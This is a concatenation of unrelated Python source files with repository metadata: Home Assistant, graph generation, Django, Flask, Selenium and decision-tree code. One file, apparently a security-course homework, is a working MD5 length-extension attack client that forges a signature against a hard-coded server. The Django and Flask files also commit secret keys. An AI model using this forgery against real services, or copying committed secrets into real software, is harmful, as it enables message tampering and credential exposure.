            # before we setup the device so we can skip it instead of failing.
            # webhooks are normally a list, however if there is an error
            # rachio hands us back a dict
            if isinstance(webhooks, dict):
                _LOGGER.error(
                    "Failed to add rachio controller '%s' because of an error: %s",
                    controller[KEY_NAME],
                    webhooks.get("error", "Unknown Error"),
                )
                continue
            rachio_iro = RachioIro(hass, self.rachio, controller, webhooks)
            rachio_iro.setup()
            self._controllers.append(rachio_iro)
        _LOGGER.info('Using Rachio API as user "%s"', self.username)
    @property
    def user_id(self) -> str:
        """Get the user ID as defined by the Rachio API."""
        return self._id
    @property
    def controllers(self) -> list:
        """Get a list of controllers managed by this account."""
        return self._controllers
    def start_multiple_zones(self, zones) -> None:
        """Start multiple zones."""
        self.rachio.zone.start_multiple(zones)
class RachioIro:
    """Represent a single Rachio Iro sprinkler controller."""
    def __init__(self, hass, rachio, data, webhooks):
        """Initialize a Rachio device from its API description dict."""
        self.hass = hass
        self.rachio = rachio
        self._id = data[KEY_ID]
        self.name = data[KEY_NAME]
        self.serial_number = data[KEY_SERIAL_NUMBER]
        self.mac_address = data[KEY_MAC_ADDRESS]
        self.model = data[KEY_MODEL]
        self._zones = data[KEY_ZONES]
        self._schedules = data[KEY_SCHEDULES]
        self._flex_schedules = data[KEY_FLEX_SCHEDULES]
        self._init_data = data
        self._webhooks = webhooks
        _LOGGER.debug('%s has ID "%s"', str(self), self.controller_id)
    def setup(self):
        """Rachio Iro setup for webhooks."""
        # Listen for all updates
        self._init_webhooks()
    def _init_webhooks(self) -> None:
        """Start getting updates from the Rachio API."""
        current_webhook_id = None
        # First delete any old webhooks that may have stuck around
        def _deinit_webhooks(_) -> None:
            """Stop getting updates from the Rachio API."""
            # Closure note: `current_webhook_id` is still None on the immediate
            # call below; when invoked later at shutdown it sees the id saved
            # after registration.
            if not self._webhooks:
                # We fetched webhooks when we created the device, however if we call _init_webhooks
                # again we need to fetch again
                self._webhooks = self.rachio.notification.get_device_webhook(
                    self.controller_id
                )[1]
            for webhook in self._webhooks:
                if (
                    webhook[KEY_EXTERNAL_ID].startswith(WEBHOOK_CONST_ID)
                    or webhook[KEY_ID] == current_webhook_id
                ):
                    self.rachio.notification.delete(webhook[KEY_ID])
            self._webhooks = None
        _deinit_webhooks(None)
        # Choose which events to listen for and get their IDs
        event_types = []
        for event_type in self.rachio.notification.get_webhook_event_type()[1]:
            if event_type[KEY_NAME] in LISTEN_EVENT_TYPES:
                event_types.append({"id": event_type[KEY_ID]})
        # Register to listen to these events from the device
        url = self.rachio.webhook_url
        auth = WEBHOOK_CONST_ID + self.rachio.webhook_auth
        new_webhook = self.rachio.notification.add(
            self.controller_id, auth, url, event_types
        )
        # Save ID for deletion at shutdown
        current_webhook_id = new_webhook[1][KEY_ID]
        self.hass.bus.listen(EVENT_HOMEASSISTANT_STOP, _deinit_webhooks)
    def __str__(self) -> str:
        """Display the controller as a string."""
        return f'Rachio controller "{self.name}"'
    @property
    def controller_id(self) -> str:
        """Return the Rachio API controller ID."""
        return self._id
    @property
    def current_schedule(self) -> str:
        """Return the schedule that the device is running right now."""
        return self.rachio.device.current_schedule(self.controller_id)[1]
    @property
    def init_data(self) -> dict:
        """Return the information used to set up the controller."""
        return self._init_data
    def list_zones(self, include_disabled=False) -> list:
        """Return a list of the zone dicts connected to the device."""
        # All zones
        if include_disabled:
            return self._zones
        # Only enabled zones
        return [z for z in self._zones if z[KEY_ENABLED]]
    def get_zone(self, zone_id) -> Optional[dict]:
        """Return the zone with the given ID, or None if not present."""
        for zone in self.list_zones(include_disabled=True):
            if zone[KEY_ID] == zone_id:
                return zone
        return None
    def list_schedules(self) -> list:
        """Return a list of fixed schedules."""
        return self._schedules
    def list_flex_schedules(self) -> list:
        """Return a list of flex schedules."""
        return self._flex_schedules
    def stop_watering(self) -> None:
        """Stop watering all zones connected to this controller."""
        self.rachio.device.stop_water(self.controller_id)
        _LOGGER.info("Stopped watering of all zones on %s", str(self))
| [
"[email protected]"
] | |
5d2200a128aabb70c081dea75e660bd7b9a29f3e | b93c90054ede72fb706567e2b60a5e4bba5485d3 | /cru/__init__.py | 3f204900689b0e4ad473586a2413b190d0343060 | [] | no_license | guziy/ShortPythonScripts | 2568b92124003fa4b0c673c3ce872df623dff76c | 17b1ed47231aa566c8af04e19cced49a795b37d8 | refs/heads/master | 2016-09-06T01:30:30.365172 | 2014-07-18T15:52:25 | 2014-07-18T15:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | __author__ = 'huziy'
import numpy as np
def main():
    """Entry point; real logic still to be implemented."""
    # TODO: implement
    pass


if __name__ == "__main__":
    main()

# Parenthesized call form: the original `print "Hello world"` is Python-2-only
# syntax and made the module a SyntaxError under Python 3.  The statement stays
# at module level (unguarded), preserving the original import-time side effect.
print("Hello world")
| [
"[email protected]"
] | |
b1067dbd1da869a3839d1527813c511360fafa32 | 17a7e1941d1f0e9e2747ce177344cf081aeb1aa0 | /examples/sbm_arxiv_paper.py | 21987364c3ea82ea603bf54540f87aceb88df3be | [] | no_license | abdcelikkanat/rangraphgen | 413871bd757992c8c87f520c7fecbd18bc004eed | 491a94ddd0d8682ae3e6a30921e9de73327acea8 | refs/heads/master | 2020-03-21T08:09:34.540550 | 2018-07-23T16:13:55 | 2018-07-23T16:13:55 | 138,324,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | from sbm.sbm import SBM
"""
model = {}
model['sbm_N'] = 100 # the number of nodes
model['sbm_P'] = [[0.6, 0.2], [0.2, 0.8]] # edge probability matrix between nodes belonging different communities
model['sbm_block_sizes'] = [40, 60]
output_file = "../outputs/synthetic_"
output_file += "n{}_p{}_sizes{}.gml".format(model['sbm_N'], 1, ":".join(str(v) for v in model['sbm_block_sizes']))
sbm = SBM(model=model)
sbm.build_graph()
g = sbm.get_graph()
sbm.save_graph(output_file)
#sbm.plot_graph()
"""
# Build a two-community planted-partition SBM: intra-community edge probability
# c/N, inter-community probability c*(1-lambda)/N.
model = {}
N = 10000
c = 3.5
# NOTE(review): N/2 is a float under Python 3 -- confirm SBM accepts float
# block sizes or use N // 2.
model['sbm_block_sizes'] = [N/2, N/2]
K = 2
mylambda = 0.9
model['sbm_N'] = N
model['sbm_P'] = [[0.0 for _ in range(K)] for _ in range(K)]
for i in range(K):
    for j in range(K):
        if i == j:
            model['sbm_P'][i][j] = float(c) / float(N)
        else:
            model['sbm_P'][i][j] = float(c)*(1.0 - mylambda) / float(N)
# Output filename encodes the generation parameters.
output_file = "../outputs/sbm_"
output_file += "n{}_k{}_lambda{}_c{}.gml".format(N, K, mylambda, c)
sbm = SBM(model=model)
sbm.build_graph()
g = sbm.get_graph()
sbm.save_graph(output_file)
#sbm.plot_graph() | [
"[email protected]"
] | |
39cc3029c96a86e815190984cebf90bce285fb25 | 7450483dd16f7dea4bef09a5166a67c7527b7ca2 | /hw_8_stub.py | faed32fa97ff75a4f1b0a0c90f450a885d815fca | [] | no_license | rmvook/HW8_CMSC389R | 604ec50cc225926e53692fc0ebcf366dc4914a98 | 03fad8af81e2e985d121d9fbdb2d0ed939534a81 | refs/heads/master | 2020-03-09T15:45:17.796936 | 2018-04-16T15:11:50 | 2018-04-16T15:11:50 | 128,867,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,824 | py | # do `curl http://starship.python.net/~gherman/programs/md5py/md5py.py > md5.py`
# if you do not have it from the git repo
# MD5 length-extension attack client (homework stub): asks the remote service to
# sign a message, then forges a valid hash for message||padding||malicious
# without knowing the 6-byte secret.
# NOTE(review): Python 2 only -- str.decode('hex') and str-based sockets do not
# exist in Python 3.
import md5py, socket, hashlib, string, sys, os, time
f = open("output.txt", "w")
host = "159.89.236.106" # IP address or URL
port = 5678 # port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
print(data)
#####################################
### STEP 1: Calculate forged hash ###
#####################################
one = "1\n"
s.send(one)  # menu option 1: ask the server to sign a message
data = s.recv(1024)
print(data)
message = 'blahah' # original message here
s.send(message + "\n")
data = s.recv(1024)
print(data)
temp = data[40:]  # skip the fixed-width banner that precedes the hex digest
legit = temp.strip()
print(legit)
f.write("Hash from which I based my crafted hash: " + legit + "\n")
# a legit hash of secret + message goes here, obtained from signing a message
# initialize hash object with state of a vulnerable hash
fake_hash = md5py.new('A' * 64)
# Seed the MD5 internal registers (A,B,C,D) from the server's digest so that
# update() continues hashing as if secret+message+padding had been consumed.
fake_hash.A, fake_hash.B, fake_hash.C, fake_hash.D = md5py._bytelist2long(legit.decode('hex'))
malicious = 'bluhuh' # put your malicious message here
# update legit hash with malicious message
fake_hash.update(malicious)
# test is the correct hash for md5(secret + message + padding + malicious)
test = fake_hash.hexdigest()
print("Testing fake" + test)
f.write("Fake hash" + test + "\n")
#############################
### STEP 2: Craft payload ###
#############################
# TODO: calculate proper padding based on secret + message
# secret is 6 bytes long (48 bits)
# each block in MD5 is 512 bits long
# secret + message is followed by bit 1 then bit 0's (i.e. \x80\x00\x00...)
# after the 0's is a bye with message length in bits, little endian style
# (i.e. 20 char msg = 160 bits = 0xa0 = '\xa0\x00\x00\x00\x00\x00\x00\x00\x00')
# craft padding to align the block as MD5 would do it
# (i.e. len(secret + message + padding) = 64 bytes = 512 bits
nulls = "\x00" * 43
end = "\x00" * 7
# \x80 terminator + zero fill + 0x60 length field (96 bits = 6-byte secret + 6-byte message)
padding = "\x80" + nulls + "\x60" + end
# payload is the message that corresponds to the hash in `test`
# server will calculate md5(secret + payload)
# = md5(secret + message + padding + malicious)
# = test
payload = message + padding + malicious
print("PAYLOAD: " + payload)
# send `test` and `payload` to server (manually or with sockets)
# REMEMBER: every time you sign new data, you will regenerate a new secret!
f.write("PAYLOAD: " + payload + "\n")
two = "2\n"
s.send(two) #telling the server that I want to verify a hash.
data = s.recv(1024)
print(data)
s.send(test + "\n")
data = s.recv(1024)
print(data)
s.send(payload + "\n")
data = s.recv(1024) # was not receiving everything, so did it twice.
print(data)
data = s.recv(1024)
print(data)
s.close()# close the connection
f.close()#close the file | [
"[email protected]"
] | |
bd3d8511ec40499ea66fcc1e2c71b26b17f8565d | cd79b7919fd0984c12e8acde8abda4290fd65b0f | /draftcast/settings.py | dbaf6a6cc14ebfb87a7c0db296138f30760cc41a | [] | no_license | rallen0150/nfl_draftcast | 7d5d84352986349f0646a9199d3aa3b29bfac4a2 | 3f5f9980902ee73fbca3c5b3db4545179ff5208a | refs/heads/master | 2021-01-20T04:43:00.356120 | 2017-04-29T14:45:16 | 2017-04-29T14:45:16 | 89,718,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,349 | py | """
Django settings for draftcast project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
# Django 1.11 settings module for the draftcast project (django-admin generated).
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control here -- rotate it and
# load it from the environment before any production deployment.
SECRET_KEY = 'xkaaf7fhx_nv$1(!enr!opy*x47n85mi^3!hapv_#dapytq$ls'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['quiet-garden-99226.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'app',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'draftcast.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'draftcast.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# Third-party helper that parses a Heroku-style DATABASE_URL environment
# variable; when present it overrides the SQLite default below.
import dj_database_url
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
database_config = dj_database_url.config()
if database_config:
    DATABASES['default'] = database_config
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
fed1af0912a71ebae30785c3e9dcaec26f4337f6 | d29c1c1901b8f5aac07ea67c969f4e96e3642376 | /venv/Scripts/pip-script.py | 670e74ae05294d33a619274f5839d91a361a2800 | [] | no_license | aljaserm/pdf | 10f0f97572fb2021604e70aeb3ed2f8920668a12 | 4648703819260380ebc942bba31817e47821f23f | refs/heads/master | 2020-08-29T20:41:32.846815 | 2019-12-12T00:03:21 | 2019-12-12T00:03:21 | 218,169,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | #!C:\Users\aljas\OneDrive\Documents\Development\Python\pdf\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
aa6145e09b71b6311ef725f088a53c2d8f67c1e5 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_hacking.py | 5138e808004dfe243f61edf4bc4bd5dbb450c3c0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _HACKING():
def __init__(self,):
self.name = "HACKING"
self.definitions = hack
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['hack']
| [
"[email protected]"
] | |
f378db34785d00813c8dcfbbeaac5e36f4951d2b | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/prb_control/entities/battle_session/__init__.py | a41701b1d0acaedce8b7e47eb63a44121abed16e | [] | no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 401 | py | # 2017.08.29 21:45:30 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/prb_control/entities/battle_session/__init__.py
pass  # decompiled module body is empty; placeholder emitted by the decompiler
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\prb_control\entities\battle_session\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:45:30 Střední Evropa (letní čas)
| [
"[email protected]"
] | |
5c7e781861cf2f6c726c08b123b74dd794c2056e | 5fa91971a552de35422698ad3e371392fd5eb48a | /docs/webflask/todo/todo_z4.py | 7b5d27384609f0e5dd9f8849bc294038bdc06384 | [
"MIT",
"CC-BY-SA-4.0"
] | permissive | koduj-z-klasa/python101 | 64b0bf24da6c7fc29c0d3c5a74ce7975d648b760 | accfca2a8a0f2b9eba884bffe31be6d1e73fb615 | refs/heads/master | 2022-06-06T09:29:01.688553 | 2022-05-22T19:50:09 | 2022-05-22T19:50:09 | 23,770,911 | 45 | 182 | MIT | 2022-03-31T10:40:13 | 2014-09-07T21:01:09 | Python | UTF-8 | Python | false | false | 1,835 | py | # -*- coding: utf-8 -*-
# todo/todo.py
from flask import Flask, g
from flask import render_template
import os
import sqlite3
from datetime import datetime
from flask import flash, redirect, url_for, request
app = Flask(__name__)
# NOTE(review): SECRET_KEY is hard-coded -- acceptable for this tutorial app
# only; load from the environment in production.  DATABASE lives next to the
# application package.
app.config.update(dict(
    SECRET_KEY='bardzosekretnawartosc',
    DATABASE=os.path.join(app.root_path, 'db.sqlite'),
    SITE_NAME='Moje zadania'
))
def get_db():
    """Return the app-context SQLite connection, opening it on first use."""
    if g.get('db'):
        return g.db
    connection = sqlite3.connect(app.config['DATABASE'])
    connection.row_factory = sqlite3.Row  # rows allow column access by name
    g.db = connection  # cache on the application context for reuse
    return g.db
@app.teardown_appcontext
def close_db(error):
    """Close the app-context database connection, if one was opened."""
    connection = g.get('db')
    if connection:
        connection.close()
@app.route('/')
def index():
    """Render the static landing page."""
    return render_template('index.html')
@app.route('/zadania', methods=['GET', 'POST'])
def zadania():
    """Task list view: POST adds a new task, GET lists tasks newest-first."""
    error = None
    if request.method == 'POST':
        zadanie = request.form['zadanie'].strip()
        if len(zadanie) > 0:
            # New tasks start as not done ('0') and are timestamped now.
            zrobione = '0'
            data_pub = datetime.now()
            db = get_db()
            db.execute('INSERT INTO zadania VALUES (?, ?, ?, ?);',
                       [None, zadanie, zrobione, data_pub])
            db.commit()
            flash('Dodano nowe zadanie.')
            # Redirect-after-POST so a refresh does not re-submit the form.
            return redirect(url_for('zadania'))
        error = 'Nie możesz dodać pustego zadania!'  # validation error message
    db = get_db()
    kursor = db.execute('SELECT * FROM zadania ORDER BY data_pub DESC;')
    zadania = kursor.fetchall()
    return render_template('zadania_lista.html', zadania=zadania, error=error)
if __name__ == '__main__':
    # Development server only: debug=True enables the reloader and debugger.
    app.run(debug=True)
| [
"[email protected]"
] | |
74305ab38ac0340b375cb8afb1b90ea07fd23e36 | bf24b73282ae80b7ff813f2d794bdace9421b017 | /carapace/carapace/doctype/rejection_gate_entry_items/rejection_gate_entry_items.py | b3a21751d4d81fda563dfdc4c1c7c58850e5338e | [
"MIT"
] | permissive | hrgadeha/carapace | 8d78cc8d45c1de0293204dfbd47802e1eebf87ee | 3c001422c6b05644a52f6250c55526b23cbd4320 | refs/heads/master | 2022-01-20T11:37:26.765923 | 2022-01-09T09:38:57 | 2022-01-09T09:38:57 | 163,376,460 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RejectionGateEntryitems(Document):
	"""Doctype controller; all behavior comes from the Frappe Document base class."""
| [
"[email protected]"
] | |
8cbc7c2bbd2aaea3b6bd0378c72ca37769c8035d | 955b968d46b4c436be55daf8aa1b8fc8fe402610 | /ch04/baidu_screenshot.py | c3aca7449f0e884890aadc2bfc8ba7f2977f6243 | [] | no_license | han-huang/python_selenium | 1c8159fd1421b1f0e87cb0df20ae4fe82450f879 | 56f9f5e5687cf533c678a1c12e1ecaa4c50a7795 | refs/heads/master | 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from time import sleep, ctime
from selenium import webdriver
import os
driver = webdriver.Firefox()
# driver = webdriver.Chrome()
driver.get("http://www.baidu.com")
# http://selenium-python.readthedocs.io/api.html?highlight=get_screenshot_as_file#selenium.webdriver.remote.webdriver.WebDriver.get_screenshot_as_file
# get_screenshot_as_file(filename)
# Saves a screenshot of the current window to a PNG image file. Returns
# False if there is any IOError, else returns True. Use full paths in your filename.
# Args:
# filename: The full path you wish to save your screenshot to. This should end with a .png extension.
# Usage:
# driver.get_screenshot_as_file(‘/Screenshots/foo.png’)
# Windows-style path: screenshot saved next to this script, named after it.
save = os.getcwd() + '\\' + os.path.splitext(__file__)[0] + ".png"
try:
    # 'kw_error' is not Baidu's search-box id (and `send_key` lacks the trailing
    # 's'), so this lookup appears intended to fail and exercise the except path.
    driver.find_element_by_id('kw_error').send_key('selenium')
    driver.find_element_by_id('su').click()
except:
    # NOTE(review): bare except -- narrow to WebDriverException if refactored.
    driver.get_screenshot_as_file(save)
# driver.quit()
| [
"vagrant@LaravelDemoSite"
] | vagrant@LaravelDemoSite |
ca84176dcc4543867190893bc2a6e3aca04b239d | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_01.py | 32d42c2a2ca6ef3b58162d8cb4c81ff8efba1721 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,409 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
""" 查找节点 例:淘宝"""
"""
find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector
"""
from selenium import webdriver
# First, initialize and launch the browser
browser = webdriver.Chrome()
# Open the page
browser.get('https://www.taobao.com')
# Nodes can be located by ID, CSS selector, XPath, or name
input_first = browser.find_element_by_id('q')
input_second = browser.find_element_by_css_selector('#q')
input_third = browser.find_element_by_xpath('//*[@id="q"]')
input_fouth = browser.find_element_by_name('q')
# Print the elements that were found
print(input_first, '\n', input_second,'\n', input_third,'\n', input_fouth)
browser.close()
# Selenium 还提供了通用的 find_element() 方法,它需要传入两个参数,一个是查找的方式
# By,另一个就是值,实际上它就是 find_element_by_id() 这种方法的通用函数版本
# 比如 find_element_by_id(id) 就等价于 find_element(By.ID, id),二者得到的结果完全一致。
# from selenium import webdriver
# from selenium.webdriver.common.by import By
#
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input_first = browser.find_element(By.ID, 'q')
# print(input_first)
# browser.close()
| [
"[email protected]"
] | |
2d6e5f19e61795d94a3b817b0a1f16c5256a54de | f2da63de512183804290bfcabfa60eaca3649e05 | /projects/StatCan/non-probability/handcraftsman/chap03/code/dtree.py | 0f015898b2acb2e4ed655a7df2ecca353250e4b5 | [] | no_license | paradisepilot/statistics | a94bb57ebe453d49c06815c523e8f633423cb68e | 50daf644baca1f40253edf91083ed42d4c5f9342 | refs/heads/master | 2022-07-25T16:19:07.751886 | 2022-06-26T21:18:38 | 2022-06-26T21:18:38 | 5,012,656 | 0 | 2 | null | 2019-04-22T06:52:55 | 2012-07-13T01:11:42 | HTML | UTF-8 | Python | false | false | 9,345 | py | # File: dtree.py
# from chapter 3 of _Tree-based Machine Learning Algorithms_
#
# Author: Clinton Sheppard <[email protected]>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from numbers import Number
import operator
import math
def build(data, outcomeLabel, continuousAttributes=None):
    """Induce a decision tree from tabular data.

    :param data: list of rows; row 0 holds the column labels, the remaining
        rows hold the samples.
    :param outcomeLabel: label of the column to predict.
    :param continuousAttributes: optional list of column labels to treat as
        continuous; when omitted, any column whose observed values are all
        numeric is auto-detected as continuous.
    :return: a DTree built over the induced nodes.
    """
    # Every column except the outcome is a candidate split attribute.
    attrIndexes = [index for index, label in enumerate(data[0]) if label != outcomeLabel]
    print( "attrIndexes: " + str(attrIndexes) )
    outcomeIndex = data[0].index(outcomeLabel)
    print( "outcomeIndex: " + str(outcomeIndex) )
    continuousAttrIndexes = set()
    if continuousAttributes is not None:
        continuousAttrIndexes = {data[0].index(label) for label in continuousAttributes}
        if len(continuousAttrIndexes) != len(continuousAttributes):
            raise Exception('One or more continuous column names are duplicates.')
    else:
        # Auto-detect: a column is continuous when all of its values are numbers.
        for attrIndex in attrIndexes:
            uniqueValues = {row[attrIndex] for rowIndex, row in enumerate(data) if rowIndex > 0}
            numericValues = {value for value in uniqueValues if isinstance(value, Number)}
            if len(uniqueValues) == len(numericValues):
                continuousAttrIndexes.add(attrIndex)
    print( "continuousAttrIndexes: " + str(continuousAttrIndexes) )
    nodes = []
    lastNodeNumber = 0
    # Work items: (parent node id, node id, row indexes covered by that node).
    # Row index 0 is the header, so data rows start at 1.
    workQueue = [ (-1, lastNodeNumber, set(i for i in range(1, len(data)))) ]
    while len(workQueue) > 0:
        print( "~~~~~~~~~~" )
        parentNodeId, nodeId, dataRowIndexes = workQueue.pop()
        print(
            "parentNodeId: " + str(parentNodeId) + ", " +
            "nodeId: " + str(nodeId) + ", " +
            "dataRowIndexes: " + str(dataRowIndexes)
        )
        uniqueOutcomes = set(data[i][outcomeIndex] for i in dataRowIndexes)
        if len(uniqueOutcomes) == 1:
            # All covered rows share one outcome: emit a leaf (nodeId, outcome).
            nodes.append((nodeId, uniqueOutcomes.pop()))
            continue
        # Rank candidate splits; potentials[0] is the best-scoring one.
        potentials = _get_potentials(
            attrIndexes = attrIndexes,
            continuousAttrIndexes = continuousAttrIndexes,
            data = data,
            dataRowIndexes = dataRowIndexes,
            outcomeIndex = outcomeIndex
        )
        attrIndex, attrValue, isMatch = potentials[0][1:]
        print(
            "attrIndex: " + str(attrIndex) + ", " +
            "attrValue: " + str(attrValue) + ", " +
            "isMatch: " + str(isMatch)
        )
        # Partition the rows by the chosen comparator and enqueue both halves.
        matches = {
            rowIndex for rowIndex in dataRowIndexes
            if isMatch(data[rowIndex][attrIndex],attrValue)
        }
        nonMatches = dataRowIndexes - matches
        lastNodeNumber += 1
        matchId = lastNodeNumber
        workQueue.append((nodeId, matchId, matches))
        print( " match: " + str( (nodeId, matchId, matches) ) )
        lastNodeNumber += 1
        nonMatchId = lastNodeNumber
        workQueue.append((nodeId, nonMatchId, nonMatches))
        print( "non-match: " + str( (nodeId, nonMatchId, nonMatches) ) )
        # Interior node: 8-tuple consumed by DTree.
        nodes.append(
            (nodeId, attrIndex, attrValue, isMatch, matchId, nonMatchId, len(matches), len(nonMatches))
        )
    print( "~~~~~~~~~~" )
    # DTree indexes nodes by id, so order them accordingly.
    nodes = sorted(nodes, key = lambda n: n[0])
    return DTree(nodes, data[0])
def _get_potentials(
    attrIndexes,
    continuousAttrIndexes,
    data,
    dataRowIndexes,
    outcomeIndex
):
    """Enumerate and rank candidate (attribute, value, comparator) splits.

    Discrete attributes contribute equality tests against each observed value;
    continuous attributes contribute greater-than tests from
    _get_continuous_av_pairs.  Result rows are
    (-bias, attrIndex, attrValue, comparator) sorted ascending, so the
    best-scoring split comes first.
    """
    uniqueAttributeValuePairs = {
        (attrIndex, data[rowIndex][attrIndex], operator.eq)
        for attrIndex in attrIndexes
        if attrIndex not in continuousAttrIndexes
        for rowIndex in dataRowIndexes
    }
    print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
    print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
    print()
    continuousAttributeValuePairs = _get_continuous_av_pairs(
        continuousAttrIndexes,
        data,
        dataRowIndexes
    )
    print( "continuousAttributeValuePairs: " + str(continuousAttributeValuePairs) )
    print( "len(continuousAttributeValuePairs) = " + str(len(continuousAttributeValuePairs)) )
    print()
    uniqueAttributeValuePairs |= continuousAttributeValuePairs
    print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
    print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
    print()
    # Negate the bias so that sorting ascending puts the best split first.
    potentials = sorted(
        (-_get_bias(avPair, dataRowIndexes, data, outcomeIndex), avPair[0], avPair[1], avPair[2])
        for avPair in uniqueAttributeValuePairs
    )
    print( "potentials: " + str(potentials) )
    print( "len(potentials) = " + str(len(potentials)) )
    print()
    return potentials
def _get_continuous_av_pairs(continuousAttrIndexes, data, dataRowIndexes):
    """Build greater-than split candidates for the continuous attributes.

    For each continuous column, the covered values are sorted and a bounded
    number of discontinuity points (value changes, found center-out) become
